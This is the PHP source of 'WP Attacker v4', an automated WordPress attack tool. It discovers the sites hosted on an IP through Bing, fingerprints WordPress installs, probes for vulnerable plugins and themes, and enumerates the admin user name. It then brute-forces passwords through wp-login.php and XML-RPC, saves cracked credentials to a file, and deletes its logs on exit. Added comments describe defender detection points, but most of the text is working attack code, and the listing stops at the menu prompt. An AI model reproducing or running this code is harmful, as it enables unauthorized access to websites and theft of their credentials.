Googleinurl

[TOOL] WP Attacker v4 © Group XP 2014

May 4th, 2015
  1. <?php
  2. /*
  3.    
  4.    
  5.               ██████╗ ██████╗  ██████╗ ██╗   ██╗██████╗     ██╗  ██╗██████╗
  6.              ██╔════╝ ██╔══██╗██╔═══██╗██║   ██║██╔══██╗    ╚██╗██╔╝██╔══██╗
  7.              ██║  ███╗██████╔╝██║   ██║██║   ██║██████╔╝     ╚███╔╝ ██████╔╝
  8.              ██║   ██║██╔══██╗██║   ██║██║   ██║██╔═══╝      ██╔██╗ ██╔═══╝
  9.              ╚██████╔╝██║  ██║╚██████╔╝╚██████╔╝██║         ██╔╝ ██╗██║    
  10.               ╚═════╝ ╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═╝         ╚═╝  ╚═╝╚═╝ ALM3REFH.COM
  11.    
  12.    
  13.     ██╗    ██╗██████╗      █████╗ ████████╗████████╗ █████╗  ██████╗██╗  ██╗███████╗██████╗
  14.     ██║    ██║██╔══██╗    ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
  15.     ██║ █╗ ██║██████╔╝    ███████║   ██║      ██║   ███████║██║     █████╔╝ █████╗  ██████╔╝
  16.     ██║███╗██║██╔═══╝     ██╔══██║   ██║      ██║   ██╔══██║██║     ██╔═██╗ ██╔══╝  ██╔══██╗
  17.     ╚███╔███╔╝██║         ██║  ██║   ██║      ██║   ██║  ██║╚██████╗██║  ██╗███████╗██║  ██║
  18.      ╚══╝╚══╝ ╚═╝         ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ FORTH VERSION
  19.    
  20.     WP Attacker v4 © Group XP 2014
  21.    
  22.     Coder : Hannibal Ksa (@r00t3rz)
  23.     Home  : alm3refh.com, sec4ever.com
  24.    
  25.    
  26.     What's WP Attacker:
  27.     - Scan the server's websites, and filter the ones that are using WordPress (using the Bing search engine [API]).
  28.     - Get all the possible plugins and themes which are vulnerable (using a list). *UPDATED*
  29.     - BruteForce each website that uses Wordpress (Using a correct username and a passwords list).
  30.     - BruteForce each website that uses Wordpress (via XMLRPC's file using a correct username). *NEW*
  31.     - Get All the possible plugins and themes, which are vulnerable (Using security dbs). *UPDATED*
  32.     - Exploit 'em (Using more than 20 new/0day exploits). *UNDERGROUND*
  33.    
  34.     Why WP Attacker?
  35.     - Using the Bing API, which leads to a faster and guaranteed response.
  36.     - User can use his own 0day exploits.
  37.     - BruteForce with two methods/ways.
  38.     - List can be updated by the user.
  39.     - Fast, simple and easy.
  40.    
  41.     # In a simple word, it is an "Automatic WP Exploiter".
  42.    
  43.     Disclaimer:
  44.     - THIS TOOL WAS WRITTEN FOR EDUCATIONAL PURPOSES. ONLY USE THIS TOOL ON WEBSITES YOU ARE ALLOWED TO TEST
  45.     - THE AUTHOR CANNOT AND WILL NOT IN ANY WAY LIABLE FOR ANY LOSS OR DAMAGE ARISING WITH THE USE OF THIS TOOL.
  46.     - USE IT UNDER YOUR OWN RISK!
  47.     - IF YOU DON'T AGREE WITH WHAT I SAID, PLEASE DON'T USE THIS TOOL.
  48.    
  49.     Thanks and enjoy.
  50.    
  51.     And stay tuned!
  52.     Best regards, Ali (aka Hannibal Ksa).
  53.    
  54. */
// Turn off all PHP error reporting for the rest of the run, so failed requests
// and missing files in the code below produce no visible warning.
error_reporting(0);
  56. function clear(){
  57.     ##########################
  58.    ##   CLEAN THE SCREEN   ##
  59.    ####################################################
  60.    ##  FIXED TO BE ABLE TO WORK ON OSX AND OTHER OS  ##
  61.    ####################################################
  62.    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { #strtolower(PHP_SHLIB_SUFFIX) === 'dll'
  63.        @system('cls'); # Windows
  64.    } else { # DIRECTORY_SEPARATOR == '\\'
  65.        @system('clear'); # Linux/UNIX/OS X
  66.    }
  67. }
  68. function banner(){
  69.     ##########################################################
  70.    ##    BANNERS/COPYRIGHTS  R00T3RZ.COM & ALM3REFH.COM    ##
  71.    ##   REMOVING THIS WILL ONLY MAKES YOU A "DOUCHEBAG!"   ##
  72.    ##########################################################
  73.    ####################
  74.    ##  FIRST BANNER  ##
  75.    ####################
  76.    $bannerone = "\n\t  _      _____    ___ _______________  _______ _________";
  77.     $bannerone .="\n\t | | /| / / _ \  / _ /_  __/_  __/ _ |/ ___/ //_/ __/ _ \\";
  78.     $bannerone .="\n\t | |/ |/ / ___/ / __ |/ /   / / / __ / /__/ ,< / _// , _/";
  79.     $bannerone .="\n\t |__/|__/_/    /_/ |_/_/   /_/ /_/ |_\___/_/|_/___/_/|_| \n";
  80.     $bannerone .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
  81.     #####################
  82.    ##  SECOND BANNER  ##
  83.    #####################
  84.    $bannertwo = "\n\t           (                                              ";
  85.     $bannertwo .="\n\t (  (      )\ )     (        )   )            )           ";
  86.     $bannertwo .="\n\t )\))(   '(()/(     )\    ( /(( /(   )     ( /(   (  (    ";
  87.     $bannertwo .="\n\t((_)()\ )  /(_)) ((((_)(  )\())\()| /(  (  )\()) ))\ )(   ";
  88.     $bannertwo .="\n\t_(())\_)()(_))    )\ _ )\(_))(_))/)(_)) )\((_)\ /((_|()\  ";
  89.     $bannertwo .="\n\t\ \((_)/ /| _ \   (_)_\(_) |_| |_((_)_ ((_) |(_|_))  ((_) ";
  90.     $bannertwo .="\n\t \ \/\/ / |  _/    / _ \ |  _|  _/ _` / _|| / // -_)| '_| ";
  91.     $bannertwo .="\n\t  \_/\_/  |_|     /_/ \_\ \__|\__\__,_\__||_\_\\\\___||_|   \n";
  92.     $bannertwo .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
  93.     ####################
  94.    ##  THIRD BANNER  ##
  95.    ####################
  96.    $bannerthr = "\n\t _ _ _ _____    _____ _   _           _           ";
  97.     $bannerthr .="\n\t| | | |  _  |  |  _  | |_| |_ ___ ___| |_ ___ ___ ";
  98.     $bannerthr .="\n\t| | | |   __|  |     |  _|  _| .'|  _| '_| -_|  _|";
  99.     $bannerthr .="\n\t|_____|__|     |__|__|_| |_| |__,|___|_,_|___|_|  \n";
  100.     $bannerthr .="\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
  101.     #####################
  102.    ##  FOURTH BANNER  ##
  103.    #####################
  104.    $bannerfor = "\n\t _    _______    ___  _   _             _             ";
  105.     $bannerfor .="\n\t| |  | | ___ \  / _ \| | | |           | |            ";
  106.     $bannerfor .="\n\t| |  | | |_/ / / /_\ \ |_| |_ __ _  ___| | _____ _ __ ";
  107.     $bannerfor .="\n\t| |/\| |  __/  |  _  | __| __/ _` |/ __| |/ / _ \ '__|";
  108.     $bannerfor .="\n\t\  /\  / |     | | | | |_| || (_| | (__|   <  __/ |   ";
  109.     $bannerfor .="\n\t \/  \/\_|     \_| |_/\__|\__\__,_|\___|_|\_\___|_|   \n";
  110.     $bannerfor .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
  111.     ####################
  112.    ##  FIFTH BANNER  ##
  113.    ####################
  114.    $bannerfiv = "\n\t██╗    ██╗██████╗      █████╗ ████████╗████████╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ ";
  115.     $bannerfiv .="\n\t██║    ██║██╔══██╗    ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗";
  116.     $bannerfiv .="\n\t██║ █╗ ██║██████╔╝    ███████║   ██║      ██║   ███████║██║     █████╔╝ █████╗  ██████╔╝";
  117.     $bannerfiv .="\n\t██║███╗██║██╔═══╝     ██╔══██║   ██║      ██║   ██╔══██║██║     ██╔═██╗ ██╔══╝  ██╔══██╗";
  118.     $bannerfiv .="\n\t╚███╔███╔╝██║         ██║  ██║   ██║      ██║   ██║  ██║╚██████╗██║  ██╗███████╗██║  ██║";
  119.     $bannerfiv .="\n\t ╚══╝╚══╝ ╚═╝         ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝\n\n";
  120.     $bannerfiv .="\t\t\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
  121.     #########################################
  122.    ##   GET A RANDOME BANNER & PRINT IT   ##
  123.    ##         METASPLOIT SWAG :-P         ##
  124.    #########################################
  125.    $banner = array($bannerone, $bannertwo, $bannerthr, $bannerfor, $bannerfiv);
  126.     print $banner[array_rand($banner)];
  127. }
  128. function noblackhat(){
  129.     ##################
  130.    ##  DISCLAIMER  ##
  131.    ##################
  132.    print "\n\t ______________________________________________";
  133.     print "\n\t|    ____                        __  ______    |";
  134.     print "\n\t|   / ___|_ __ ___  _   _ _ __   \ \/ /  _ \   |";
  135.     print "\n\t|  | |  _| '__/ _ \| | | | '_ \   \  /| |_) |  |";
  136.     print "\n\t|  | |_| | | | (_) | |_| | |_) |  /  \|  __/   |";
  137.     print "\n\t|   \____|_|  \___/ \__,_| .__/  /_/\_\_|      |";
  138.     print "\n\t|                        |_|ALM3REFH.com       |";
  139.     print "\n\t|                                              |";
  140.     print "\n\t+----------------------------------------------+";
  141.     print "\n\t|       WP Attacker v4 - By Hannibal Ksa       |";
  142.     print "\n\t+----------------------------------------------+\n\n";
  143.     print "\n\t\t    !! NO SHIA / ONLY SUNNAH !!\n\n";
  144.     ###########################
  145.    ##  5 SECONDS DISCLAIMER ##
  146.    ###########################
  147.    print "\n\n\tThis tool may be used for legal purposes only.  Users take full
  148. \tresponsibility for any actions performed using this tool.            
  149. \tWP-ATTACKER comes with ABSOLUTELY NO WARRANTY!                            
  150. \tIf these terms are not acceptable to you, then do not use this tool.
  151. \n\tPlease Read! Continuing in 5 seconds ";
  152.     sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ". ";
  153.     print "\n\n\n\n";
  154. }
/**
 * Sends one query to the Bing Search API (Azure Datamarket endpoint) and
 * appends the DisplayUrl of every returned result to sites.txt.
 *
 * The driver at the bottom of the file calls this with "ip:<address> ..."
 * queries, i.e. it asks the search engine which sites it has indexed on one IP.
 *
 * @param string $hk Query text; it is wrapped in single quotes and URL-encoded.
 * @return void
 */
function bing_it($hk){
    // Placeholder value: the operator has to supply an API account key.
    $account_key = 'ACCOUNT_KEY_GOES_HERE';
    $query = $hk;
    $url = "https://api.datamarket.azure.com/Bing/Search/v1/Web?Query=".urlencode("'$query'")."&\$format=json";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FRESH_CONNECT,true);
    // The same hard-coded User-Agent string is used for every request in this file.
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
    // NOTE(review): certificate and host-name verification are both disabled on
    // the handle that also carries the account key as its user/password pair, so
    // the key is readable by anyone able to intercept the connection.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_USERPWD, $account_key . ":" . $account_key);
    $json = curl_exec($ch);
    curl_close($ch);
    // The response is decoded and walked without checking that the request
    // succeeded or that the d->results structure is present.
    $data = json_decode($json);
    foreach ($data->d->results as $value) {
        // sites.txt is reopened in append mode for every single result.
        $file = fopen("sites.txt","a+");
        fwrite($file,"{$value->DisplayUrl}\n");
        fclose($file);
    }
}
/**
 * Fetches the entries read from $list and records in wp-sites.txt those whose
 * response body contains "wp-content" or "wp-includes", then removes duplicate
 * lines from wp-sites.txt.
 *
 * Defender's view: the fingerprint is a plain GET of the site with the fixed
 * User-Agent below. The handle is executed twice per entry, so each URL is
 * requested twice in a row, which makes the pattern easy to spot in access logs.
 *
 * @param string $list Path of the candidate list (the driver passes sites.txt).
 * @return void
 */
function wp($list){
    $file = file_get_contents($list);
    $get = explode('\n', $file);
    foreach($get as $site){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $site);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
        $result = curl_exec($ch);
        // Second execution of the same handle; its result is discarded.
        curl_exec($ch);
        curl_close($ch);
        // WordPress is assumed when either standard directory name appears
        // anywhere in the returned markup.
        if(preg_match("#wp-content#", $result) or preg_match("/wp-includes/", $result)){
            $filename = 'wp-sites.txt';
            $fp = fopen($filename, "a+");
            $write = fputs($fp, $site."\n");
            fclose($fp);
        }
    }
    // Rewrite wp-sites.txt with duplicate lines removed.
    $lines = file('wp-sites.txt');
    $lines = array_unique($lines);
    file_put_contents('wp-sites.txt', implode($lines));
}
/**
 * Derives the WordPress base URL of every site in $list from the pingback
 * <link> element of its page, and stores the results in wp.txt (de-duplicated).
 *
 * Defender's view: the pingback link in the page head discloses both the
 * install path and the XML-RPC endpoint. Where XML-RPC is not needed,
 * disabling it and removing the pingback link takes away this shortcut.
 *
 * @param string $list Path of the list to read (the driver passes wp-sites.txt).
 * @return void
 */
function wp_em($list){
    $file = file_get_contents($list);
    $get = explode("\n", $file);
    foreach($get as $wpsite){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $wpsite);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
        $result = curl_exec($ch);
        // Second execution of the same handle; its result is discarded.
        curl_exec($ch);
        curl_close($ch);
        // Capture the href of <link rel="pingback" ...>; the match result is not
        // checked, so a page without that element still writes a line to wp.txt.
        preg_match('|<link rel="pingback" href="(.*?)" />|', $result, $url);
        // Dropping "xmlrpc.php" from the href leaves the base URL of the install.
        $wpurl = str_replace("xmlrpc.php","",$url[1]);
        $filename = 'wp.txt';
        $fp = fopen($filename, "a+");
        $write = fputs($fp, $wpurl."\n");
        fclose($fp);
    }
    // Rewrite wp.txt with duplicate lines removed.
    $lines = file('wp.txt');
    $lines = array_unique($lines);
    file_put_contents('wp.txt', implode($lines));
}
/**
 * Probes one site for the plugin/theme files named in a list and prints a
 * "FOUND" line for each apparent hit.
 *
 * List format, one entry per line: NAME:PATH:KEYWORD
 * (example from the original: xp:wp-content/plugins/xp/xp.php:Group-XP).
 * NAME and PATH are required, KEYWORD is optional.
 *
 * Two modes:
 *  - $key == NULL: the status line returned by get_headers() is tested for "200".
 *  - otherwise: the body is fetched and searched for the entry's KEYWORD.
 *
 * Defender's view: this shows up as a burst of requests for plugin and theme
 * file paths, most of them answered with 404, all carrying the fixed User-Agent
 * (keyword mode). Removing unused plugins and themes and keeping the rest
 * patched limits what such a probe can find; rate limiting blunts the burst.
 *
 * @param string      $target Base URL of the site.
 * @param string      $list   Path of the NAME:PATH:KEYWORD list.
 * @param string|null $key    NULL selects header mode, any other value keyword mode.
 * @return void
 */
function xp_scanner($target, $list, $key = NULL){
    $file = file_get_contents($list);
    $plugins = explode("\n", $file);
    if($key == NULL){
        foreach($plugins as $plugin){
            // Header mode: only the HTTP status line is examined.
            $x = explode(":", $plugin);
            $target = $target.'/'.$x[1];
            $check = @get_headers($target);
            if(eregi("200",$check[0])){
                print "\n\t[!] FOUND $x[0] -> $target";
                // (Disabled in the original: appending the hit to vuln.txt.)
            }
        }
    }else{
        foreach($plugins as $plugin){
            // Keyword mode: fetch the file and look for the entry's keyword.
            $x = explode(":", $plugin);
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $target.'/'.$x[1]);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
            $result = curl_exec($ch);
            // Second execution of the same handle; its result is discarded.
            curl_exec($ch);
            curl_close($ch);
            // The keyword is placed into the pattern as-is, without escaping.
            if(preg_match("#".$x[2]."#", $result)){
                print "\n\t[!] FOUND $x[0] -> $target";
                // (Disabled in the original: appending the hit to vuln.txt.)
            }
        }
    }
}
/**
 * Collects the plugin directory names referenced in a page's markup and hands
 * each one to xp_scanner_db().
 *
 * Defender's view: plugin slugs appear in the asset URLs of ordinary pages
 * (/plugins/<slug>/), so they cannot be treated as secret; what matters is
 * that the installed versions are current.
 *
 * @param string $target URL of the page to read (redirects are followed).
 * @return void
 */
function xp_get_plugins($target){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
    $result = curl_exec($ch);
    // Second execution of the same handle; its result is discarded.
    curl_exec($ch);
    curl_close($ch);
    // Capture group 1 holds whatever sits between "/plugins/" and the next "/".
    preg_match_all("#/plugins/(.*?)/#i", $result, $plugin);
    $plugins = array_unique($plugin[1]);
    // No message is printed when nothing is found (that branch is disabled).
    foreach($plugins as $found){
        xp_scanner_db($target, $found);
    }
}
/**
 * Collects the theme directory names referenced in a page's markup and hands
 * each one to xp_scanner_db(). Mirrors xp_get_plugins(), with the pattern
 * anchored on /wp-content/themes/ instead of /plugins/.
 *
 * Defender's view: the active theme's slug is visible in stylesheet and script
 * URLs of every page, so protection has to come from keeping the theme updated.
 *
 * @param string $target URL of the page to read (redirects are followed).
 * @return void
 */
function xp_get_themes($target){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
    $result = curl_exec($ch);
    // Second execution of the same handle; its result is discarded.
    curl_exec($ch);
    curl_close($ch);
    // Capture group 1 holds whatever sits between "/wp-content/themes/" and the next "/".
    preg_match_all("#/wp-content/themes/(.*?)/#i", $result, $theme);
    $themes = array_unique($theme[1]);
    // No message is printed when nothing is found (that branch is disabled).
    foreach($themes as $found){
        xp_scanner_db($target, $found);
    }
}
/**
 * Checks whether a plugin/theme slug is mentioned in the response obtained for
 * $wpexploit and, if so, appends a line about $target to vulpl.txt.
 *
 * The original header names wordpressexploit.com and exploit-db.com as the
 * sources; only the first URL is present in the code. The test is a bare
 * text match on the slug and involves no version comparison.
 *
 * @param string $target Site the slug was seen on (used only in the log line).
 * @param string $plugin Slug to look for; inserted into the pattern unescaped.
 * @return void
 */
function xp_scanner_db($target, $plugin){
    $wpexploit = array("http://www.wordpressexploit.com/", );
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $wpexploit);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
    $result = curl_exec($ch);
    // Second execution of the same handle; its result is discarded.
    curl_exec($ch);
    curl_close($ch);
    if(preg_match("#$plugin#", $result)){
        // A match is logged to vulpl.txt; nothing is printed to the terminal.
        $data = "\n[!] $target -> seems to has a vulnerability plugin which is [ $plugin ]";
        $filename = 'vulpl.txt';
        $fp = fopen($filename, "a+");
        $write = fputs($fp, $data."\n");
        fclose($fp);
    }
}
/**
 * Guesses a site's first account name from its author archive and then starts
 * one of the two password-guessing routines with that name.
 *
 * It requests <target>/?author=1, follows redirects, and takes the text of the
 * <title> element up to the first "|" as the user name.
 * NOTE(review): this presumably relies on the theme printing the author name
 * first in the archive title; the code does not verify the result.
 *
 * Defender's view: requests for /?author=N are a well-known enumeration probe
 * and are worth alerting on or blocking. Account names should be assumed
 * discoverable, so protection has to come from strong passwords, multi-factor
 * authentication and login throttling.
 *
 * @param string      $target Base URL of the site.
 * @param string      $list   Path of the password list passed on to the next stage.
 * @param string|null $xmlrpc NULL selects xp_brute(), anything else xp_brute_xmlrpc().
 * @return mixed Whatever the selected routine returns.
 */
function xp_get_user($target,$list, $xmlrpc = NULL){
    $user = trim(($target))."/?author=1";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $user);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
    $result = curl_exec($ch);
    // Second execution of the same handle; its result is discarded.
    curl_exec($ch);
    curl_close($ch);
    // Text of the page title; the first "|"-separated segment is used as the name.
    preg_match('#<title>(.*?)</title>#', $result, $username);
    $account = explode('|', $username[1]);
    if($xmlrpc == NULL){
        // Form-based guessing against wp-login.php.
        return xp_brute($target,$account[0],$list);
    }else {
        // Guessing through the XML-RPC endpoint.
        return xp_brute_xmlrpc($target,$account[0],$list);
    }
}
/**
 * Password guessing against the wp-login.php form: one POST per line of the
 * password list, stopping at the first response that looks like the dashboard.
 *
 * Password list format: one password per line.
 *
 * Defender's view (log and control points visible in this code):
 *  - repeated POSTs to /wp-login.php from one client, each with
 *    rememberme=forever and the fixed User-Agent string below;
 *  - requests are sequential with a 10-second timeout and no delay between
 *    attempts, so they arrive as a tight burst;
 *  - success is judged by the marker 'tab-panel-overview' in the response.
 * Login rate limiting or lockout, multi-factor authentication and rejection of
 * common passwords are the standard countermeasures.
 *
 * @param string $target Base URL of the site (trimmed here).
 * @param string $user   Account name to try (trimmed here).
 * @param string $list   Path of the password list.
 * @return void
 */
function xp_brute($target,$user,$list){
    $file = file_get_contents($list);
    $passwords = explode("\n", $file);
    $target = trim($target);
    $user = trim($user);
    print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
    foreach($passwords as $password){
        $redirect = $taregt."/wp-admin/";
        $curl = curl_init();
        curl_setopt($curl,CURLOPT_URL, $target."/wp-login.php");
        curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
        curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
        curl_setopt($curl,CURLOPT_TIMEOUT,10);
        curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
        // Cookies are kept in a file built from the current working directory.
        curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
        curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
        // Only the submit-button value is URL-encoded; user name and password
        // are placed into the form body as-is.
        $urlencode = urlencode("Log+In&redirect_to=$redirect&testcookie=1");
        curl_setopt($curl,CURLOPT_POSTFIELDS, "log=$user&pwd=$password&rememberme=forever&wp-submit=$urlencode");
        $result = curl_exec($curl);
        curl_close($curl);
        // Treated as a successful login when the marker string is present.
        if(strstr($result, 'tab-panel-overview')){
            print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
            // The credential pair is appended in clear text to cracked.txt.
            $data = "\n[!] Cracked $target -> [ $user:$password ]";
            $filename = 'cracked.txt';
            $fp = fopen($filename, "a+");
            $write = fputs($fp, $data."\n");
            fclose($fp);
            break;
        }
    }
}
/**
 * Reports whether <target>/xmlrpc.php answers with a status line containing "200".
 *
 * Defender's view: a site that does not use XML-RPC can disable or block the
 * endpoint, in which case this check fails and the XML-RPC routine gives up.
 *
 * @param string $target Base URL of the site.
 * @return int 1 when "200" appears in the first response header line, else 0.
 */
function xp_check_xmlrpc($target){
    $target = $target."/xmlrpc.php";
    // @ hides the warning get_headers() raises when the request fails.
    $check = @get_headers($target);
    if(eregi("200",$check[0])){
        return 1;
    }else{
        return 0;
    }
}
/**
 * Password guessing through XML-RPC: one wp.getUsersBlogs call per line of the
 * password list, stopping at the first response that contains an isAdmin member.
 *
 * Password list format: one password per line.
 *
 * Defender's view (log and control points visible in this code):
 *  - repeated POSTs to /xmlrpc.php whose body names wp.getUsersBlogs;
 *  - an XML body sent with Content-Type application/x-www-form-urlencoded,
 *    an unusual pairing, together with the fixed User-Agent string;
 *  - attempts are sequential, with no delay between them.
 * Disabling XML-RPC where it is unused, or throttling and monitoring
 * authenticated XML-RPC methods, addresses this path; form-login lockouts
 * alone do not necessarily cover it.
 *
 * @param string $target Base URL of the site (trimmed here).
 * @param string $user   Account name to try (trimmed here).
 * @param string $list   Path of the password list.
 * @return void
 */
function xp_brute_xmlrpc($target,$user,$list){
    $target = trim($target);
    $user = trim($user);
    // Give up when the endpoint does not answer with a 200 status line.
    if(xp_check_xmlrpc($target) != 1){
        print "\n[!] Couldn't find xmlrpc.php in $target\n";
        break;
    }else{
        $file = file_get_contents($list);
        $passwords = explode("\n", $file);
        print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
        foreach($passwords as $password){
            $password = trim($password);
            $headers = array('Content-Type: application/x-www-form-urlencoded');
            // Marker looked for in the response to decide that a login worked.
            $isadmin = '<name>isAdmin</name>';
            // XML-RPC request body; user name and password are interpolated as-is.
            $data = "
           <methodCall>
               <methodName>wp.getUsersBlogs</methodName>
               <params>
               <param><value><string>$user</string></value></param>
               <param><value><string>$password</string></value></param>
           </params></methodCall>
           ";
            $curl = curl_init();
            curl_setopt($curl,CURLOPT_URL, $target."/xmlrpc.php");
            curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
            curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
            curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
            curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
            curl_setopt($curl,CURLOPT_TIMEOUT,10);
            curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
            curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
            curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
            curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
            $result = curl_exec($curl);
            curl_close($curl);
            if(strstr($result, $isadmin)){
                print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
                // The credential pair is appended in clear text to cracked.txt.
                $data = "\n[!] Cracked $target -> [ $user:$password ]";
                $filename = 'cracked.txt';
                $fp = fopen($filename, "a+");
                $write = fputs($fp, $data."\n");
                fclose($fp);
                break;
            }
        }
    }
}
  541. function bye(){
  542.     ########################
  543.    ##  DONE/SAY GOODBYE  ##
  544.    ########################
  545.    print "\n\n[+] DONE!\n[-] EXITING.\n\n";
  546.     ######################
  547.    ## DELETE LOG FILES ##
  548.    ###################################################################
  549.    ## NOTE: YOU CAN REMOVE THIS TO HAVE MORE INFO ABOUT THE TARGET! ##
  550.    ###################################################################
  551.    unlink('sites.txt');
  552.     unlink('wp-sites.txt');
  553.     unlink('wp.txt');
  554.     unlink('vuln.txt');
  555.     unlink('cracked.txt');
  556.     exit(2);
  557. }
// ---------------------------------------------------------------------------
// Command-line driver.
// Working files, all created in the current directory: sites.txt,
// wp-sites.txt, wp.txt, vuln.txt, cracked.txt, vulpl.txt. On a machine this
// script was run from, these names (and wp-cookie.txt) are the artefacts to
// look for.
// ---------------------------------------------------------------------------
// The screen is cleared and the disclaimer shown before the CLI check runs.
clear();
noblackhat();
// Stop unless PHP is running as the command-line SAPI.
if( strtolower(php_sapi_name()) != 'cli' ) {
    printf("%s\n", "Please run only from command line interface.");
    exit;
}
clear();
banner();
print "\nIP-Address # ";
// The address is read from standard input and only trimmed; the
// FILTER_VALIDATE_IP check is commented out in the original, so the value goes
// into the search queries unvalidated.
$target = trim(fgets(STDIN));
// Remove working files left over from an earlier run.
unlink('sites.txt');
unlink('wp-sites.txt');
unlink('wp.txt');
unlink('vuln.txt');
unlink('cracked.txt');
unlink('vulpl.txt');
// Recreate each working file empty.
$log1 = fopen("sites.txt","w");fclose($log1);
$log2 = fopen("wp-sites.txt","w");fclose($log2);
$log3 = fopen("wp.txt","w");fclose($log3);
$log4 = fopen("vuln.txt","w");fclose($log4);
$log4 = fopen("cracked.txt","w");fclose($log4);
$log5 = fopen("vulpl.txt","w");fclose($log5);
// Optional extra search terms appended to the "ip:" query.
print "\nDORK [or simply leave it empty] # ";
$dork = trim(fgets(STDIN));
print "\n[+] Getting the server's sites";
if($dork == ""){
    // No extra terms given: four built-in queries are sent.
    bing_it("ip:$target");
    bing_it("ip:".$target." /page_id=");
    bing_it("ip:".$target." Wordpress");
    bing_it("ip:".$target." blog");
}else{
    // Extra terms given: a single query with them appended.
    bing_it("ip:".$target." ".$dork);
}
print "\n[+] Separating the sites";
// sites.txt -> wp-sites.txt (pages that look like WordPress) -> wp.txt (base URLs).
wp('sites.txt');
wp_em('wp-sites.txt');
// Print every non-empty line of wp.txt.
print "\n[+] Finished, these are the website/s that I found:\n";
$wplist = file_get_contents('wp.txt');
$get = explode("\n", $wplist);
foreach($get as $hk){
    if(!$hk==""){
        print "\n\t[!] $hk";
    }
}
// Menu: the answer is read from standard input and compared with the four
